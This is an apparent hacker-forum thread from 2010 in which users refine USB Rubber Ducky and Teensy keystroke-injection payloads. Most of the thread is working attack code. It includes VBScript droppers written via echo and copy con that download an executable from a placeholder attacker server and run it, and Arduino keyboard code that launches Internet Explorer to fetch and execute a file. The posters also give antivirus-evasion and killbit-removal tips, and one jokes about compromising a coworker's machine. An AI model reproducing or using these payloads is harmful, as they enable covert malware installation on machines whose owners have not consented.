[Version 1] Downloading File With Ducky

[nox404]

Maybe something like this would work have the duck load up cmd and type in...

echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
exit

this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good.

I Will be testing it here soon once my ducky gets here.

Tell me what you guys think?

[illwill]

as far as I know that was blocked by Microsoft with a killbit entry in the registry years ago

You would have to delete this key first to make it work

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

[nox404]

tested it on windows xp vista and win7 all of it works.

[Sebkinne]

Works but is recognized by most AVs as an exploit...

But good work anyway

Seb

[nxt471]

Could not test it on a VM, AV blocked it as I saved it.

I guess you could type it in manually, AVs are not looking for what you type, only the files.

[Sebkinne]

Actually, the av will recognize it when the ducky just creates it like above in the CommandPromt..

when you write the commands to the file dl.vb with the > and >>, it writes to the file. once the last part of the file is complete, the av will call it, because it monitors files that are JUST being written to... so, a different method needs to be found...

[nox404]

Yes, this is very true that AVs will find it. I was thinking of using windows built in ftp but the firewall by default blocks it.

How about this guys.

<start from cmd>

prompt>> "C:\Program Files\Internet Explorer\iexplore.exe" www.YOURSERVER.info/nox404/test.exe
alt-r
alt-r
prompt>> exit

I tested this with internet explorer 8.

This will open internet explore to a file. From there it will ask you to run download etc... you hit alt-r this will run the .exe and then again alt-r. at this point you will have executed the file. Then type exit walk away.

This happens very fast the IE window dos not stay open it will close on its own. I tested this out with a small bot (10kb) and it worked great almost instantaneous.

What do you guy think?

PS. I will be getting my ducky today(at least that what UPS says). Then i can start testing out real world applications.

[nox404]

void setup() { } // no setup needed
void loop() {
  delay(10000);
  // Windows key  
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  // Windows Key + R to open run
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //delay for computer
  delay(500);
  //send cmd into run
  Keyboard.print("cmd");
  // for the computer
  delay(50);
  // This hits the enter key
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //Testing Delay
  delay(500);
  //Send exit to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // another delay :)
  delay(100);
  
    //Send exit to cmd.
  Keyboard.print("exit");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //this stops it from re running for a bit
  delay(500000);
  
}

This is code that i have tested on 4 systems here win7 twice and vista twice.

This executes explorer and downloads the file running it in the process.

will change it up so that i can do it all from the run prompt.

Tell me what you guys think. O yeah got the Ducky today thing works like a charm.

Edited April 21, 2010 by nox404

[Sebkinne]

This is code that i have tested on 4 systems here win7 twice and vista twice.

This executes explorer and downloads the file running it in the process.

will change it up so that i can do it all from the run prompt.

Tell me what you guys think. O yeah got the Ducky today thing works like a charm.

Looks good, I will try it out on a range of different machienes, good work!

Seb

[AndrewFaulds]

Maybe something like this would work have the duck load up cmd and type in...

echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
exit

this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good.

I Will be testing it here soon once my ducky gets here.

Tell me what you guys think?

Why the echo commands? copy con is more efficient ;)

Just do:

copy con dl.vbs[RETURN]
Dim HTTPGET[RETURN]
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN]
HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN]
HTTPGET.Send[RETURN]
DataBin = HTTPGET.ResponseBody[RETURN]
Const adTypeBinary=1[RETURN]
Const adSaveCreateOverWrite=2[RETURN]
Dim test1[RETURN]
Set test1 = CreateObject("ADODB.Stream")[RETURN]
test1.Type = adTypeBinary[RETURN]
test1.Open[RETURN]
test1.Write DataBin[RETURN]
test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z]
file.exe[RETURN]
exit[RETURN]

Edited April 22, 2010 by AndrewFaulds

[fjux]

then what about this?

when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files.

so why not let the VBS execute the file. its only 3 lines.

Dim DataBin 
Dim HTTPGET 
Set HTTPGET = CreateObject("Microsoft.XMLHTTP") 
HTTPGET.Open "GET", "http://www.domain.com/file.exe", False 
HTTPGET.Send 
DataBin = HTTPGET.ResponseBody 
Const adTypeBinary=1 
Const adSaveCreateOverWrite=2 
Dim test1 
Set test1 = CreateObject("ADODB.Stream") 
test1.Type = adTypeBinary 
test1.Open 
test1.Write DataBin 
test1.SaveToFile "file.exe", adSaveCreateOverWrite
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & "file.exe" & Chr(34), 1, false

and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again.

it will look something like this:

echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs

and then all what is left is to run it and exit CMD:

promt> dl.vbs

promt> exit

i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome!

since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke)

cheers!

Edited April 22, 2010 by fjux

[AndrewFaulds]

then what about this?

when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files.

so why not let the VBS execute the file. its only 3 lines.

Dim DataBin 
Dim HTTPGET 
Set HTTPGET = CreateObject("Microsoft.XMLHTTP") 
HTTPGET.Open "GET", "http://www.domain.com/file.exe", False 
HTTPGET.Send 
DataBin = HTTPGET.ResponseBody 
Const adTypeBinary=1 
Const adSaveCreateOverWrite=2 
Dim test1 
Set test1 = CreateObject("ADODB.Stream") 
test1.Type = adTypeBinary 
test1.Open 
test1.Write DataBin 
test1.SaveToFile "file.exe", adSaveCreateOverWrite
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & "file.exe" & Chr(34), 1, false

and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again.

it will look something like this:

echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs

and then all what is left is to run it and exit CMD:

promt> dl.vbs

promt> exit

i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome!

since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke)

cheers!

Uh....

You can't have multiple echo commands in a line.

And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.

[fjux]

yes you can have multiple echo;s in one line.

it is separated by && and cmd recognises it as a new command.

i was thinking of this for at the run box.

cmd.exe /c <command> though the command was to long for the box.

when i order my duckey i will try both ways wich one is faster to execute

[AndrewFaulds]

yes you can have multiple echo;s in one line.

it is separated by && and cmd recognises it as a new command.

i was thinking of this for at the run box.

cmd.exe /c <command> though the command was to long for the box.

when i order my duckey i will try both ways wich one is faster to execute

Still, copy con is more efficient.

[nox404]

void setup() { } // no setup needed
void loop() {
  delay(10000);
  // Windows key  
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  // Windows Key + R to open run
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //delay for computer
  delay(500);
  //send cmd into run
  Keyboard.print("cmd");
  // for the computer
  delay(50);
  // This hits the enter key
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //Testing Delay
  delay(500);
  //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // another delay :)
  delay(100);
  
    //Send exit to cmd.
  Keyboard.print("exit");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //this stops it from re running for a bit
  delay(500000);
  
}

This is code that i have tested on 4 systems here win7 twice and vista twice.

This executes explorer and downloads the file running it in the process.

will change it up so that i can do it all from the run prompt.

Tell me what you guys think. O yeah got the Ducky today thing works like a charm.

Change a line in the code.

Now:
 //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");

To:
 //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe && exit");

**Thanks to fjux for showing me that "&&" works in Windows to add another command.

This will close CMD after lunching explorer.

This code is tested and works better then before.

With about 15 seconds, i can compromise a system. IT guy at work logs into my system then somehow i make him look away plug this bad boy in and bam! j/king would never use this for "evil".

Requests: Can some of you guys that have one do some testing on the delay timers and see what you guys find it the best amount of time. All of the ones i have set up are there for testing so there a bit long.

[fjux]

i still like the VBS way of downloading more cos of the less time it shows something on the screen.

but if you want to do it that way,

i recommend just doing it in the run box.

like:

"c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe

that does the same, without showing the cmd at all ;)

[AndrewFaulds]

i still like the VBS way of downloading more cos of the less time it shows something on the screen.

but if you want to do it that way,

i recommend just doing it in the run box.

like:

"c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe

that does the same, without showing the cmd at all ;)

Or, even better:

Open the run box, type iexplore http://attacksite.com

[nox404]

Sorry do not get me wrong, I love the fact that you guys are actively talking and working on the Vb-script.

I am just working on every way i can think of downloading a file using Ducky. To me Ducky is more of a crafted tool less of a hacksaw own everything. More of a i got a target so let me use vb script to download files if they do not have and AV that blocks it or let me use the Explorer method. I'm Hoping in the long run people will take the information in this thread and add it to wiki as download methods (I will do it once the wiki is up and i find the time).

Thank all of you for looking into these methods and helping me refine them!

** I tested out the Vb script at work and it works flawless on are test system.